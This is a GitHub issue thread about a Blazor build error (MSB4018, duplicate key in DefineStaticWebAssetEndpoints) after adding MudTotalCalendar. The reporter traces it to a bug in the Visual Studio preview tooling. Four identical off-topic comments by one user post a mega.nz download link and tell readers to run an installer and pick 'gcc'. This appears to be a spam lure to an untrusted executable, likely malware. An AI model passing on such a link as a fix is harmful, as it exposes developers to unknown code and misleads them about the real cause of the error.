### ISSUE TITLE
Build failed after installing MudTotalCalendar

### ISSUE THREAD

**Issue by Gareth064** [danheron/Heron.MudTotalCalendar#34]
### Visual Studio 22 Version
17.12.0 Preview 1.0
### Project version
NET 8
### MudBlazor Version
7.6.0

### Build Errors
```
3>\.nuget\packages\microsoft.net.sdk.webassembly.pack\9.0.0-preview.7.24405.7\build\Microsoft.NET.Sdk.WebAssembly.Browser.targets(347,5): error MSB4018: The "DefineStaticWebAssetEndpoints" task failed unexpectedly.
3>\.nuget\packages\microsoft.net.sdk.webassembly.pack\9.0.0-preview.7.24405.7\build\Microsoft.NET.Sdk.WebAssembly.Browser.targets(347,5): error MSB4018: System.ArgumentException: An item with the same key has already been added.
3>\.nuget\packages\microsoft.net.sdk.webassembly.pack\9.0.0-preview.7.24405.7\build\Microsoft.NET.Sdk.WebAssembly.Browser.targets(347,5): error MSB4018:    at System.ThrowHelper.ThrowArgumentException(ExceptionResource resource)
3>\.nuget\packages\microsoft.net.sdk.webassembly.pack\9.0.0-preview.7.24405.7\build\Microsoft.NET.Sdk.WebAssembly.Browser.targets(347,5): error MSB4018:    at System.Collections.Generic.Dictionary`2.Insert(TKey key, TValue value, Boolean add)
3>\.nuget\packages\microsoft.net.sdk.webassembly.pack\9.0.0-preview.7.24405.7\build\Microsoft.NET.Sdk.WebAssembly.Browser.targets(347,5): error MSB4018:    at System.Linq.Enumerable.ToDictionary[TSource,TKey,TElement](IEnumerable`1 source, Func`2 keySelector, Func`2 elementSelector, IEqualityComparer`1 comparer)
3>\.nuget\packages\microsoft.net.sdk.webassembly.pack\9.0.0-preview.7.24405.7\build\Microsoft.NET.Sdk.WebAssembly.Browser.targets(347,5): error MSB4018:    at Microsoft.AspNetCore.StaticWebAssets.Tasks.DefineStaticWebAssetEndpoints.Execute()
3>\.nuget\packages\microsoft.net.sdk.webassembly.pack\9.0.0-preview.7.24405.7\build\Microsoft.NET.Sdk.WebAssembly.Browser.targets(347,5): error MSB4018:    at Microsoft.Build.BackEnd.TaskExecutionHost.Execute()
3>\.nuget\packages\microsoft.net.sdk.webassembly.pack\9.0.0-preview.7.24405.7\build\Microsoft.NET.Sdk.WebAssembly.Browser.targets(347,5): error MSB4018:    at Microsoft.Build.BackEnd.TaskBuilder.<ExecuteInstantiatedTask>d__26.MoveNext()
```

Also tried creating a brand new Blazor WebApp, added Nuget packge, done a build and same error.

### Update
This only appears to happen when using the Preview Version of Visual Studio. I have download the GA version and its builds fine.

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by danheron** [comment]
I haven't done any testing with .Net 9 yet.  It's probably best to stick to .NET 8 and the GA version of Visual Studio when using MudTotalCalendar.

**Comment by Gareth064** [comment]
I raised it with the visual studio team in the end and they have confirmed its a bug in their tooling, rather than something wrong with yours or other libraries 👍
